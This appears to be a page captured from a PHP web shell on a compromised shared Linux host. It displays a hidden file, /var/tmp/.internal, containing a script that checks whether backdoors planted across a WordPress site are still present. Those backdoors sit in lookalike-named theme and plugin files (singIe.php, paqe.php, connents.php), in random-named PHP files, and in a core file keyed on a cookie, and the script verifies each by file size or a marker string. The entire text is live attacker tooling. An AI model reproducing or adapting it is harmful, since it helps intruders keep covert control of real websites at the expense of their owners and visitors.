HEX
Server: Apache
System: Linux pdx1-shared-a2-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: dh_hwg2wc (6369923)
PHP: 8.1.31
Disabled: NONE
Upload Files
File: //var/tmp/.internal
<?php   $r = '/home/dh_h5prje/obidigital.org'; $x = ["/wp-includes/class-wp-http-curl.php"=>"bd@@207316@@_COOKIE[3]",
"/wp-content/plugins/security-1751114192/wp-config.php"=>"bd@@722435@@727",
"/wp-content/themes/archives-1748011991/singIe.php"=>"bd@@716306@@727",
"/wp-content/plugins/gallery_1748028130/paqe.php"=>"bd@@263202@@727",
"/wp-content/themes/top_1747416584/connents.php"=>"bd@@1126@@1166",
"/wp-content/plugins/wpforms-lite/templates/admin/payments/single/details.php"=>"bd@@378039@@Feature-Policy",
"/86dd87.php"=>"bd@@24026@@105",
"/01c220.php"=>"bd@@508899@@105"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');